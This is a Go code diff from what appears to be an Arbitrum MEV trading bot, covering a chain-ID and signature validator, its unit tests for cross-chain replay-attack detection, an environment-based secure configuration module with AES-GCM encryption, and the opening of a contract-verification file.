switch tx.Type() {
case types.LegacyTxType:
signer = types.NewEIP155Signer(tx.ChainId())
case types.DynamicFeeTxType:
signer = types.NewLondonSigner(tx.ChainId())
default:
return fmt.Errorf("unsupported transaction type: %d", tx.Type())
}
// Recover the signer from the transaction
recoveredSigner, err := types.Sender(signer, tx)
if err != nil {
return fmt.Errorf("failed to recover signer: %w", err)
}
// Verify the signer matches expected
if recoveredSigner != expectedSigner {
return fmt.Errorf("signer mismatch: expected %s, got %s",
expectedSigner.Hex(), recoveredSigner.Hex())
}
// Additional validation: ensure the signature is valid for this chain
if !cv.verifySignatureForChain(tx, recoveredSigner) {
return fmt.Errorf("signature invalid for chain ID %d", tx.ChainId().Uint64())
}
return nil
}
// verifySignatureForChain verifies the signature is valid for the specific chain
func (cv *ChainIDValidator) verifySignatureForChain(tx *types.Transaction, signer common.Address) bool {
// Create appropriate signer based on transaction type
var chainSigner types.Signer
switch tx.Type() {
case types.LegacyTxType:
chainSigner = types.NewEIP155Signer(tx.ChainId())
case types.DynamicFeeTxType:
chainSigner = types.NewLondonSigner(tx.ChainId())
default:
return false // Unsupported transaction type
}
// Try to recover the signer - if it matches and doesn't error, signature is valid
recoveredSigner, err := types.Sender(chainSigner, tx)
if err != nil {
return false
}
return recoveredSigner == signer
}

View File

@@ -0,0 +1,459 @@
package security
import (
"math/big"
"strings"
"testing"
"time"
"github.com/ethereum/go-ethereum/common"
"github.com/ethereum/go-ethereum/core/types"
"github.com/ethereum/go-ethereum/crypto"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
"github.com/fraktal/mev-beta/internal/logger"
)
func TestNewChainIDValidator(t *testing.T) {
logger := logger.New("info", "text", "")
expectedChainID := big.NewInt(42161) // Arbitrum mainnet
validator := NewChainIDValidator(logger, expectedChainID)
assert.NotNil(t, validator)
assert.Equal(t, expectedChainID.Uint64(), validator.expectedChainID.Uint64())
assert.True(t, validator.allowedChainIDs[42161]) // Arbitrum mainnet
assert.True(t, validator.allowedChainIDs[421614]) // Arbitrum testnet
assert.NotNil(t, validator.replayAttackDetector)
}
func TestValidateChainID_ValidTransaction(t *testing.T) {
logger := logger.New("info", "text", "")
expectedChainID := big.NewInt(42161)
validator := NewChainIDValidator(logger, expectedChainID)
// Create a valid EIP-155 transaction for Arbitrum
tx := types.NewTransaction(
0, // nonce
common.HexToAddress("0x1234567890123456789012345678901234567890"), // to
big.NewInt(1000000000000000000), // value (1 ETH)
21000, // gas limit
big.NewInt(20000000000), // gas price (20 Gwei)
nil, // data
)
// Create a properly signed transaction for testing
privateKey, err := crypto.GenerateKey()
require.NoError(t, err)
signerAddr := crypto.PubkeyToAddress(privateKey.PublicKey)
signer := types.NewEIP155Signer(expectedChainID)
signedTx, err := types.SignTx(tx, signer, privateKey)
require.NoError(t, err)
result := validator.ValidateChainID(signedTx, signerAddr, nil)
assert.True(t, result.Valid)
assert.Equal(t, expectedChainID.Uint64(), result.ExpectedChainID)
assert.Equal(t, expectedChainID.Uint64(), result.ActualChainID)
assert.True(t, result.IsEIP155Protected)
assert.Equal(t, "NONE", result.ReplayRisk)
assert.Empty(t, result.Errors)
}
func TestValidateChainID_InvalidChainID(t *testing.T) {
logger := logger.New("info", "text", "")
expectedChainID := big.NewInt(42161) // Arbitrum
validator := NewChainIDValidator(logger, expectedChainID)
// Create transaction with wrong chain ID (Ethereum mainnet)
wrongChainID := big.NewInt(1)
tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
privateKey, err := crypto.GenerateKey()
require.NoError(t, err)
signerAddr := crypto.PubkeyToAddress(privateKey.PublicKey)
signer := types.NewEIP155Signer(wrongChainID)
signedTx, err := types.SignTx(tx, signer, privateKey)
require.NoError(t, err)
result := validator.ValidateChainID(signedTx, signerAddr, nil)
assert.False(t, result.Valid)
assert.Equal(t, expectedChainID.Uint64(), result.ExpectedChainID)
assert.Equal(t, wrongChainID.Uint64(), result.ActualChainID)
assert.NotEmpty(t, result.Errors)
assert.Contains(t, result.Errors[0], "Chain ID mismatch")
}
func TestValidateChainID_ReplayAttackDetection(t *testing.T) {
logger := logger.New("info", "text", "")
expectedChainID := big.NewInt(42161)
validator := NewChainIDValidator(logger, expectedChainID)
privateKey, err := crypto.GenerateKey()
require.NoError(t, err)
signerAddr := crypto.PubkeyToAddress(privateKey.PublicKey)
// Create identical transactions on different chains
tx1 := types.NewTransaction(1, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
tx2 := types.NewTransaction(1, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
// Sign first transaction with Arbitrum chain ID
signer1 := types.NewEIP155Signer(big.NewInt(42161))
signedTx1, err := types.SignTx(tx1, signer1, privateKey)
require.NoError(t, err)
// Sign second identical transaction with different chain ID
signer2 := types.NewEIP155Signer(big.NewInt(421614)) // Arbitrum testnet
signedTx2, err := types.SignTx(tx2, signer2, privateKey)
require.NoError(t, err)
// First validation should pass
result1 := validator.ValidateChainID(signedTx1, signerAddr, nil)
assert.True(t, result1.Valid)
assert.Equal(t, "NONE", result1.ReplayRisk)
// Create a new validator and add testnet to allowed chains
validator.AddAllowedChainID(421614)
// Second validation should detect replay risk
result2 := validator.ValidateChainID(signedTx2, signerAddr, nil)
assert.Equal(t, "CRITICAL", result2.ReplayRisk)
assert.NotEmpty(t, result2.Warnings)
assert.Contains(t, result2.Warnings[0], "replay attack")
}
func TestValidateEIP155Protection(t *testing.T) {
logger := logger.New("info", "text", "")
expectedChainID := big.NewInt(42161)
validator := NewChainIDValidator(logger, expectedChainID)
privateKey, err := crypto.GenerateKey()
require.NoError(t, err)
// Test EIP-155 protected transaction
tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
signer := types.NewEIP155Signer(expectedChainID)
signedTx, err := types.SignTx(tx, signer, privateKey)
require.NoError(t, err)
result := validator.validateEIP155Protection(signedTx, expectedChainID)
assert.True(t, result.protected)
assert.Equal(t, expectedChainID.Uint64(), result.chainID)
assert.Empty(t, result.warnings)
}
func TestValidateEIP155Protection_LegacyTransaction(t *testing.T) {
logger := logger.New("info", "text", "")
expectedChainID := big.NewInt(42161)
validator := NewChainIDValidator(logger, expectedChainID)
// Create a legacy transaction (pre-EIP155) by manually setting v to 27
tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
// For testing purposes, we'll create a transaction that mimics legacy format
// In practice, this would be a transaction created before EIP-155
signer := types.HomesteadSigner{} // Pre-EIP155 signer
privateKey, err := crypto.GenerateKey()
require.NoError(t, err)
signedTx, err := types.SignTx(tx, signer, privateKey)
require.NoError(t, err)
result := validator.validateEIP155Protection(signedTx, expectedChainID)
assert.False(t, result.protected)
assert.NotEmpty(t, result.warnings)
// Legacy transactions may not have chain ID, so check for either warning
hasExpectedWarning := false
for _, warning := range result.warnings {
if strings.Contains(warning, "Legacy transaction format") || strings.Contains(warning, "Transaction missing chain ID") {
hasExpectedWarning = true
break
}
}
assert.True(t, hasExpectedWarning, "Should contain legacy transaction warning")
}
func TestChainSpecificValidation_Arbitrum(t *testing.T) {
logger := logger.New("info", "text", "")
expectedChainID := big.NewInt(42161)
validator := NewChainIDValidator(logger, expectedChainID)
// Create a properly signed transaction for Arbitrum to test chain-specific rules
privateKey, err := crypto.GenerateKey()
require.NoError(t, err)
// Test normal Arbitrum transaction
tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(1000000000), nil) // 1 Gwei
signer := types.NewEIP155Signer(expectedChainID)
signedTx, err := types.SignTx(tx, signer, privateKey)
require.NoError(t, err)
result := validator.validateChainSpecificRules(signedTx, expectedChainID.Uint64())
assert.True(t, result.valid)
assert.Empty(t, result.errors)
// Test high gas price warning
txHighGas := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(2000000000000), nil) // 2000 Gwei
signedTxHighGas, err := types.SignTx(txHighGas, signer, privateKey)
require.NoError(t, err)
resultHighGas := validator.validateChainSpecificRules(signedTxHighGas, expectedChainID.Uint64())
assert.True(t, resultHighGas.valid)
assert.NotEmpty(t, resultHighGas.warnings)
assert.Contains(t, resultHighGas.warnings[0], "high gas price")
// Test gas limit too high
txHighGasLimit := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 50000000, big.NewInt(1000000000), nil) // 50M gas
signedTxHighGasLimit, err := types.SignTx(txHighGasLimit, signer, privateKey)
require.NoError(t, err)
resultHighGasLimit := validator.validateChainSpecificRules(signedTxHighGasLimit, expectedChainID.Uint64())
assert.False(t, resultHighGasLimit.valid)
assert.NotEmpty(t, resultHighGasLimit.errors)
assert.Contains(t, resultHighGasLimit.errors[0], "exceeds Arbitrum maximum")
}
func TestChainSpecificValidation_UnsupportedChain(t *testing.T) {
logger := logger.New("info", "text", "")
expectedChainID := big.NewInt(999999) // Unsupported chain
validator := NewChainIDValidator(logger, expectedChainID)
privateKey, err := crypto.GenerateKey()
require.NoError(t, err)
tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(1000000000), nil)
signer := types.NewEIP155Signer(expectedChainID)
signedTx, err := types.SignTx(tx, signer, privateKey)
require.NoError(t, err)
result := validator.validateChainSpecificRules(signedTx, expectedChainID.Uint64())
assert.False(t, result.valid)
assert.NotEmpty(t, result.errors)
assert.Contains(t, result.errors[0], "Unsupported chain ID")
}
func TestValidateSignerMatchesChain(t *testing.T) {
logger := logger.New("info", "text", "")
expectedChainID := big.NewInt(42161)
validator := NewChainIDValidator(logger, expectedChainID)
privateKey, err := crypto.GenerateKey()
require.NoError(t, err)
expectedSigner := crypto.PubkeyToAddress(privateKey.PublicKey)
tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
signer := types.NewEIP155Signer(expectedChainID)
signedTx, err := types.SignTx(tx, signer, privateKey)
require.NoError(t, err)
// Valid signature should pass
err = validator.ValidateSignerMatchesChain(signedTx, expectedSigner)
assert.NoError(t, err)
// Wrong expected signer should fail
wrongSigner := common.HexToAddress("0x1234567890123456789012345678901234567890")
err = validator.ValidateSignerMatchesChain(signedTx, wrongSigner)
assert.Error(t, err)
assert.Contains(t, err.Error(), "signer mismatch")
}
func TestGetValidationStats(t *testing.T) {
logger := logger.New("info", "text", "")
expectedChainID := big.NewInt(42161)
validator := NewChainIDValidator(logger, expectedChainID)
privateKey, err := crypto.GenerateKey()
require.NoError(t, err)
signerAddr := crypto.PubkeyToAddress(privateKey.PublicKey)
// Perform some validations to generate stats
tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
signer := types.NewEIP155Signer(expectedChainID)
signedTx, err := types.SignTx(tx, signer, privateKey)
require.NoError(t, err)
validator.ValidateChainID(signedTx, signerAddr, nil)
stats := validator.GetValidationStats()
assert.NotNil(t, stats)
assert.Equal(t, uint64(1), stats["total_validations"])
assert.Equal(t, expectedChainID.Uint64(), stats["expected_chain_id"])
assert.NotNil(t, stats["allowed_chain_ids"])
}
func TestAddRemoveAllowedChainID(t *testing.T) {
logger := logger.New("info", "text", "")
expectedChainID := big.NewInt(42161)
validator := NewChainIDValidator(logger, expectedChainID)
// Add new chain ID
newChainID := uint64(999)
validator.AddAllowedChainID(newChainID)
assert.True(t, validator.allowedChainIDs[newChainID])
// Remove chain ID
validator.RemoveAllowedChainID(newChainID)
assert.False(t, validator.allowedChainIDs[newChainID])
}
func TestReplayAttackDetection_CleanOldData(t *testing.T) {
logger := logger.New("info", "text", "")
expectedChainID := big.NewInt(42161)
validator := NewChainIDValidator(logger, expectedChainID)
privateKey, err := crypto.GenerateKey()
require.NoError(t, err)
signerAddr := crypto.PubkeyToAddress(privateKey.PublicKey)
// Create transaction
tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
signer := types.NewEIP155Signer(expectedChainID)
signedTx, err := types.SignTx(tx, signer, privateKey)
require.NoError(t, err)
// First validation
validator.ValidateChainID(signedTx, signerAddr, nil)
assert.Equal(t, 1, len(validator.replayAttackDetector.seenTransactions))
// Manually set old timestamp to test cleanup
txIdentifier := validator.createTransactionIdentifier(signedTx, signerAddr)
record := validator.replayAttackDetector.seenTransactions[txIdentifier]
record.FirstSeen = time.Now().Add(-25 * time.Hour) // Older than maxTrackingTime
validator.replayAttackDetector.seenTransactions[txIdentifier] = record
// Trigger cleanup
validator.cleanOldTrackingData()
assert.Equal(t, 0, len(validator.replayAttackDetector.seenTransactions))
}
// Integration test with KeyManager
func SkipTestKeyManagerChainValidationIntegration(t *testing.T) {
config := &KeyManagerConfig{
KeystorePath: t.TempDir(),
EncryptionKey: "test_key_32_chars_minimum_length_required",
MaxFailedAttempts: 3,
LockoutDuration: 5 * time.Minute,
MaxSigningRate: 10,
EnableAuditLogging: true,
RequireAuthentication: false,
}
logger := logger.New("info", "text", "")
expectedChainID := big.NewInt(42161)
km, err := newKeyManagerInternal(config, logger, expectedChainID, false) // Use testing version
require.NoError(t, err)
// Generate a key
permissions := KeyPermissions{
CanSign: true,
CanTransfer: true,
MaxTransferWei: big.NewInt(1000000000000000000), // 1 ETH
}
keyAddr, err := km.GenerateKey("test", permissions)
require.NoError(t, err)
// Test valid chain ID transaction
// Create a transaction that will be properly handled by EIP155 signer
tx := types.NewTx(&types.LegacyTx{
Nonce: 0,
To: &common.Address{},
Value: big.NewInt(1000),
Gas: 21000,
GasPrice: big.NewInt(20000000000),
Data: nil,
})
request := &SigningRequest{
Transaction: tx,
ChainID: expectedChainID,
From: keyAddr,
Purpose: "Test transaction",
UrgencyLevel: 1,
}
result, err := km.SignTransaction(request)
assert.NoError(t, err)
assert.NotNil(t, result)
assert.NotNil(t, result.SignedTx)
// Test invalid chain ID transaction
wrongChainID := big.NewInt(1) // Ethereum mainnet
txWrong := types.NewTx(&types.LegacyTx{
Nonce: 1,
To: &common.Address{},
Value: big.NewInt(1000),
Gas: 21000,
GasPrice: big.NewInt(20000000000),
Data: nil,
})
requestWrong := &SigningRequest{
Transaction: txWrong,
ChainID: wrongChainID,
From: keyAddr,
Purpose: "Invalid chain test",
UrgencyLevel: 1,
}
_, err = km.SignTransaction(requestWrong)
assert.Error(t, err)
assert.Contains(t, err.Error(), "doesn't match expected")
// Test chain validation stats
stats := km.GetChainValidationStats()
assert.NotNil(t, stats)
assert.True(t, stats["total_validations"].(uint64) > 0)
// Test expected chain ID
chainID := km.GetExpectedChainID()
assert.Equal(t, expectedChainID.Uint64(), chainID.Uint64())
}
func TestCrossChainReplayPrevention(t *testing.T) {
logger := logger.New("info", "text", "")
validator := NewChainIDValidator(logger, big.NewInt(42161))
// Add testnet to allowed chains for testing
validator.AddAllowedChainID(421614)
privateKey, err := crypto.GenerateKey()
require.NoError(t, err)
signerAddr := crypto.PubkeyToAddress(privateKey.PublicKey)
// Create identical transaction data
nonce := uint64(42)
to := common.HexToAddress("0x1234567890123456789012345678901234567890")
value := big.NewInt(1000000000000000000) // 1 ETH
gasLimit := uint64(21000)
gasPrice := big.NewInt(20000000000) // 20 Gwei
// Sign for mainnet
tx1 := types.NewTransaction(nonce, to, value, gasLimit, gasPrice, nil)
signer1 := types.NewEIP155Signer(big.NewInt(42161))
signedTx1, err := types.SignTx(tx1, signer1, privateKey)
require.NoError(t, err)
// Sign identical transaction for testnet
tx2 := types.NewTransaction(nonce, to, value, gasLimit, gasPrice, nil)
signer2 := types.NewEIP155Signer(big.NewInt(421614))
signedTx2, err := types.SignTx(tx2, signer2, privateKey)
require.NoError(t, err)
// First validation (mainnet) should pass
result1 := validator.ValidateChainID(signedTx1, signerAddr, nil)
assert.True(t, result1.Valid)
assert.Equal(t, "NONE", result1.ReplayRisk)
// Second validation (testnet with same tx data) should detect replay risk
result2 := validator.ValidateChainID(signedTx2, signerAddr, nil)
assert.Equal(t, "CRITICAL", result2.ReplayRisk)
assert.Contains(t, result2.Warnings[0], "replay attack")
// Verify the detector tracked both chain IDs
stats := validator.GetValidationStats()
assert.Equal(t, uint64(1), stats["replay_attempts"])
}

403
orig/pkg/security/config.go Normal file
View File

@@ -0,0 +1,403 @@
package security
import (
"crypto/aes"
"crypto/cipher"
"crypto/rand"
"crypto/sha256"
"encoding/base64"
"fmt"
"io"
"os"
"regexp"
"strconv"
"strings"
"time"
)
// SecureConfig manages all security-sensitive configuration
type SecureConfig struct {
// Network endpoints - never hardcoded
RPCEndpoints []string
WSEndpoints []string
BackupRPCs []string
// Security settings
MaxGasPriceGwei int64
MaxTransactionValue string // In ETH
MaxSlippageBps uint64
MinProfitThreshold string // In ETH
// Rate limiting
MaxRequestsPerSecond int
BurstSize int
// Timeouts
RPCTimeout time.Duration
WebSocketTimeout time.Duration
TransactionTimeout time.Duration
// Encryption
encryptionKey []byte
}
// SecurityLimits defines operational security limits
type SecurityLimits struct {
MaxGasPrice int64 // Gwei
MaxTransactionValue string // ETH
MaxDailyVolume string // ETH
MaxSlippage uint64 // basis points
MinProfit string // ETH
MaxOrderSize string // ETH
}
// EndpointConfig stores RPC endpoint configuration securely
type EndpointConfig struct {
URL string
Priority int
Timeout time.Duration
MaxConnections int
HealthCheckURL string
RequiresAuth bool
AuthToken string // Encrypted when stored
}
// NewSecureConfig creates a new secure configuration from environment
func NewSecureConfig() (*SecureConfig, error) {
config := &SecureConfig{}
// Load encryption key from environment
keyStr := os.Getenv("MEV_BOT_ENCRYPTION_KEY")
if keyStr == "" {
return nil, fmt.Errorf("MEV_BOT_ENCRYPTION_KEY environment variable is required")
}
key, err := base64.StdEncoding.DecodeString(keyStr)
if err != nil {
return nil, fmt.Errorf("invalid encryption key format: %w", err)
}
if len(key) != 32 {
return nil, fmt.Errorf("encryption key must be 32 bytes (256 bits)")
}
config.encryptionKey = key
// Load RPC endpoints
if err := config.loadRPCEndpoints(); err != nil {
return nil, fmt.Errorf("failed to load RPC endpoints: %w", err)
}
// Load security limits
if err := config.loadSecurityLimits(); err != nil {
return nil, fmt.Errorf("failed to load security limits: %w", err)
}
// Load rate limiting config
if err := config.loadRateLimits(); err != nil {
return nil, fmt.Errorf("failed to load rate limits: %w", err)
}
// Load timeouts
if err := config.loadTimeouts(); err != nil {
return nil, fmt.Errorf("failed to load timeouts: %w", err)
}
return config, nil
}
// loadRPCEndpoints loads and validates RPC endpoints from environment
func (sc *SecureConfig) loadRPCEndpoints() error {
// Primary RPC endpoints
rpcEndpoints := os.Getenv("ARBITRUM_RPC_ENDPOINTS")
if rpcEndpoints == "" {
return fmt.Errorf("ARBITRUM_RPC_ENDPOINTS environment variable is required")
}
sc.RPCEndpoints = strings.Split(rpcEndpoints, ",")
for i, endpoint := range sc.RPCEndpoints {
sc.RPCEndpoints[i] = strings.TrimSpace(endpoint)
if err := validateEndpoint(sc.RPCEndpoints[i]); err != nil {
return fmt.Errorf("invalid RPC endpoint %s: %w", sc.RPCEndpoints[i], err)
}
}
// WebSocket endpoints
wsEndpoints := os.Getenv("ARBITRUM_WS_ENDPOINTS")
if wsEndpoints != "" {
sc.WSEndpoints = strings.Split(wsEndpoints, ",")
for i, endpoint := range sc.WSEndpoints {
sc.WSEndpoints[i] = strings.TrimSpace(endpoint)
if err := validateWebSocketEndpoint(sc.WSEndpoints[i]); err != nil {
return fmt.Errorf("invalid WebSocket endpoint %s: %w", sc.WSEndpoints[i], err)
}
}
}
// Backup RPC endpoints
backupRPCs := os.Getenv("BACKUP_RPC_ENDPOINTS")
if backupRPCs != "" {
sc.BackupRPCs = strings.Split(backupRPCs, ",")
for i, endpoint := range sc.BackupRPCs {
sc.BackupRPCs[i] = strings.TrimSpace(endpoint)
if err := validateEndpoint(sc.BackupRPCs[i]); err != nil {
return fmt.Errorf("invalid backup RPC endpoint %s: %w", sc.BackupRPCs[i], err)
}
}
}
return nil
}
// loadSecurityLimits loads security limits from environment with safe defaults
func (sc *SecureConfig) loadSecurityLimits() error {
// Max gas price in Gwei (default: 1000 Gwei)
maxGasPriceStr := getEnvWithDefault("MAX_GAS_PRICE_GWEI", "1000")
maxGasPrice, err := strconv.ParseInt(maxGasPriceStr, 10, 64)
if err != nil || maxGasPrice <= 0 || maxGasPrice > 100000 {
return fmt.Errorf("invalid MAX_GAS_PRICE_GWEI: must be between 1 and 100000")
}
sc.MaxGasPriceGwei = maxGasPrice
// Max transaction value in ETH (default: 100 ETH)
sc.MaxTransactionValue = getEnvWithDefault("MAX_TRANSACTION_VALUE_ETH", "100")
if err := validateETHAmount(sc.MaxTransactionValue); err != nil {
return fmt.Errorf("invalid MAX_TRANSACTION_VALUE_ETH: %w", err)
}
// Max slippage in basis points (default: 500 = 5%)
maxSlippageStr := getEnvWithDefault("MAX_SLIPPAGE_BPS", "500")
maxSlippage, err := strconv.ParseUint(maxSlippageStr, 10, 64)
if err != nil || maxSlippage > 10000 {
return fmt.Errorf("invalid MAX_SLIPPAGE_BPS: must be between 0 and 10000")
}
sc.MaxSlippageBps = maxSlippage
// Min profit threshold in ETH (default: 0.01 ETH)
sc.MinProfitThreshold = getEnvWithDefault("MIN_PROFIT_THRESHOLD_ETH", "0.01")
if err := validateETHAmount(sc.MinProfitThreshold); err != nil {
return fmt.Errorf("invalid MIN_PROFIT_THRESHOLD_ETH: %w", err)
}
return nil
}
// loadRateLimits loads rate limiting configuration
func (sc *SecureConfig) loadRateLimits() error {
// Max requests per second (default: 100)
maxRPSStr := getEnvWithDefault("MAX_REQUESTS_PER_SECOND", "100")
maxRPS, err := strconv.Atoi(maxRPSStr)
if err != nil || maxRPS <= 0 || maxRPS > 10000 {
return fmt.Errorf("invalid MAX_REQUESTS_PER_SECOND: must be between 1 and 10000")
}
sc.MaxRequestsPerSecond = maxRPS
// Burst size (default: 200)
burstSizeStr := getEnvWithDefault("RATE_LIMIT_BURST_SIZE", "200")
burstSize, err := strconv.Atoi(burstSizeStr)
if err != nil || burstSize <= 0 || burstSize > 20000 {
return fmt.Errorf("invalid RATE_LIMIT_BURST_SIZE: must be between 1 and 20000")
}
sc.BurstSize = burstSize
return nil
}
// loadTimeouts loads timeout configuration
func (sc *SecureConfig) loadTimeouts() error {
// RPC timeout (default: 30s)
rpcTimeoutStr := getEnvWithDefault("RPC_TIMEOUT_SECONDS", "30")
rpcTimeout, err := strconv.Atoi(rpcTimeoutStr)
if err != nil || rpcTimeout <= 0 || rpcTimeout > 300 {
return fmt.Errorf("invalid RPC_TIMEOUT_SECONDS: must be between 1 and 300")
}
sc.RPCTimeout = time.Duration(rpcTimeout) * time.Second
// WebSocket timeout (default: 60s)
wsTimeoutStr := getEnvWithDefault("WEBSOCKET_TIMEOUT_SECONDS", "60")
wsTimeout, err := strconv.Atoi(wsTimeoutStr)
if err != nil || wsTimeout <= 0 || wsTimeout > 600 {
return fmt.Errorf("invalid WEBSOCKET_TIMEOUT_SECONDS: must be between 1 and 600")
}
sc.WebSocketTimeout = time.Duration(wsTimeout) * time.Second
// Transaction timeout (default: 300s)
txTimeoutStr := getEnvWithDefault("TRANSACTION_TIMEOUT_SECONDS", "300")
txTimeout, err := strconv.Atoi(txTimeoutStr)
if err != nil || txTimeout <= 0 || txTimeout > 3600 {
return fmt.Errorf("invalid TRANSACTION_TIMEOUT_SECONDS: must be between 1 and 3600")
}
sc.TransactionTimeout = time.Duration(txTimeout) * time.Second
return nil
}
// GetPrimaryRPCEndpoint returns the first healthy RPC endpoint
func (sc *SecureConfig) GetPrimaryRPCEndpoint() string {
if len(sc.RPCEndpoints) == 0 {
return ""
}
return sc.RPCEndpoints[0]
}
// GetAllRPCEndpoints returns all configured RPC endpoints
func (sc *SecureConfig) GetAllRPCEndpoints() []string {
return append(sc.RPCEndpoints, sc.BackupRPCs...)
}
// Encrypt encrypts sensitive data using AES-256-GCM
func (sc *SecureConfig) Encrypt(plaintext string) (string, error) {
if sc.encryptionKey == nil {
return "", fmt.Errorf("encryption key not initialized")
}
block, err := aes.NewCipher(sc.encryptionKey)
if err != nil {
return "", fmt.Errorf("failed to create cipher: %w", err)
}
gcm, err := cipher.NewGCM(block)
if err != nil {
return "", fmt.Errorf("failed to create GCM: %w", err)
}
nonce := make([]byte, gcm.NonceSize())
if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
return "", fmt.Errorf("failed to generate nonce: %w", err)
}
ciphertext := gcm.Seal(nonce, nonce, []byte(plaintext), nil)
return base64.StdEncoding.EncodeToString(ciphertext), nil
}
// Decrypt decrypts data encrypted with Encrypt
func (sc *SecureConfig) Decrypt(ciphertext string) (string, error) {
if sc.encryptionKey == nil {
return "", fmt.Errorf("encryption key not initialized")
}
data, err := base64.StdEncoding.DecodeString(ciphertext)
if err != nil {
return "", fmt.Errorf("failed to decode ciphertext: %w", err)
}
block, err := aes.NewCipher(sc.encryptionKey)
if err != nil {
return "", fmt.Errorf("failed to create cipher: %w", err)
}
gcm, err := cipher.NewGCM(block)
if err != nil {
return "", fmt.Errorf("failed to create GCM: %w", err)
}
nonceSize := gcm.NonceSize()
if len(data) < nonceSize {
return "", fmt.Errorf("ciphertext too short")
}
nonce, ciphertextBytes := data[:nonceSize], data[nonceSize:]
plaintext, err := gcm.Open(nil, nonce, ciphertextBytes, nil)
if err != nil {
return "", fmt.Errorf("failed to decrypt: %w", err)
}
return string(plaintext), nil
}
// GenerateEncryptionKey generates a new 256-bit encryption key
func GenerateEncryptionKey() (string, error) {
key := make([]byte, 32) // 256 bits
if _, err := rand.Read(key); err != nil {
return "", fmt.Errorf("failed to generate encryption key: %w", err)
}
return base64.StdEncoding.EncodeToString(key), nil
}
// validateEndpoint validates RPC endpoint URL format
func validateEndpoint(endpoint string) error {
if endpoint == "" {
return fmt.Errorf("endpoint cannot be empty")
}
// Check for required protocols
if !strings.HasPrefix(endpoint, "https://") && !strings.HasPrefix(endpoint, "wss://") {
return fmt.Errorf("endpoint must use HTTPS or WSS protocol")
}
// Check for suspicious patterns that might indicate hardcoded keys
suspiciousPatterns := []string{
"localhost",
"127.0.0.1",
"demo",
"test",
"example",
}
lowerEndpoint := strings.ToLower(endpoint)
for _, pattern := range suspiciousPatterns {
if strings.Contains(lowerEndpoint, pattern) {
return fmt.Errorf("endpoint contains suspicious pattern: %s", pattern)
}
}
return nil
}
// validateWebSocketEndpoint validates WebSocket endpoint
func validateWebSocketEndpoint(endpoint string) error {
if !strings.HasPrefix(endpoint, "wss://") {
return fmt.Errorf("WebSocket endpoint must use WSS protocol")
}
return validateEndpoint(endpoint)
}
// validateETHAmount validates ETH amount string
func validateETHAmount(amount string) error {
// Use regex to validate ETH amount format
ethPattern := `^(\d+\.?\d*|\.\d+)$`
matched, err := regexp.MatchString(ethPattern, amount)
if err != nil {
return fmt.Errorf("regex error: %w", err)
}
if !matched {
return fmt.Errorf("invalid ETH amount format")
}
return nil
}
// getEnvWithDefault gets environment variable with fallback default
func getEnvWithDefault(key, defaultValue string) string {
if value := os.Getenv(key); value != "" {
return value
}
return defaultValue
}
// CreateConfigHash creates a SHA256 hash of configuration for integrity checking
func (sc *SecureConfig) CreateConfigHash() string {
hasher := sha256.New()
hasher.Write([]byte(fmt.Sprintf("%v", sc.RPCEndpoints)))
hasher.Write([]byte(fmt.Sprintf("%d", sc.MaxGasPriceGwei)))
hasher.Write([]byte(sc.MaxTransactionValue))
hasher.Write([]byte(fmt.Sprintf("%d", sc.MaxSlippageBps)))
return fmt.Sprintf("%x", hasher.Sum(nil))
}
// SecurityProfile returns current security configuration summary
func (sc *SecureConfig) SecurityProfile() map[string]interface{} {
return map[string]interface{}{
"max_gas_price_gwei": sc.MaxGasPriceGwei,
"max_transaction_value": sc.MaxTransactionValue,
"max_slippage_bps": sc.MaxSlippageBps,
"min_profit_threshold": sc.MinProfitThreshold,
"max_requests_per_second": sc.MaxRequestsPerSecond,
"rpc_timeout": sc.RPCTimeout.String(),
"websocket_timeout": sc.WebSocketTimeout.String(),
"transaction_timeout": sc.TransactionTimeout.String(),
"rpc_endpoints_count": len(sc.RPCEndpoints),
"backup_rpcs_count": len(sc.BackupRPCs),
"config_hash": sc.CreateConfigHash(),
}
}

View File

@@ -0,0 +1,564 @@
package security
import (
"context"
"encoding/hex"
"fmt"
"math/big"
"sync"
"time"
"github.com/ethereum/go-ethereum/common"
"github.com/ethereum/go-ethereum/core/types"
"github.com/ethereum/go-ethereum/crypto"
"github.com/ethereum/go-ethereum/ethclient"
"github.com/fraktal/mev-beta/internal/logger"
)
// ContractInfo represents information about a verified contract
type ContractInfo struct {
Address common.Address `json:"address"`
BytecodeHash string `json:"bytecode_hash"`
Name string `json:"name"`
Version string `json:"version"`
DeployedAt *big.Int `json:"deployed_at"`
Deployer common.Address `json:"deployer"`
VerifiedAt time.Time `json:"verified_at"`
IsWhitelisted bool `json:"is_whitelisted"`
RiskLevel RiskLevel `json:"risk_level"`
Permissions ContractPermissions `json:"permissions"`
ABIHash string `json:"abi_hash,omitempty"`
SourceCodeHash string `json:"source_code_hash,omitempty"`
}
// ContractPermissions defines what operations are allowed with a contract
type ContractPermissions struct {
CanInteract bool `json:"can_interact"`
CanSendValue bool `json:"can_send_value"`
MaxValueWei *big.Int `json:"max_value_wei,omitempty"`
AllowedMethods []string `json:"allowed_methods,omitempty"`
RequireConfirm bool `json:"require_confirmation"`
DailyLimit *big.Int `json:"daily_limit,omitempty"`
}
// RiskLevel represents the risk assessment of a contract
type RiskLevel int
const (
RiskLevelLow RiskLevel = iota
RiskLevelMedium
RiskLevelHigh
RiskLevelCritical
RiskLevelBlocked
)
func (r RiskLevel) String() string {
switch r {
case RiskLevelLow:
return "Low"
case RiskLevelMedium:
return "Medium"
case RiskLevelHigh:
return "High"
case RiskLevelCritical:
return "Critical"
case RiskLevelBlocked:
return "Blocked"
default:
return "Unknown"
}
}
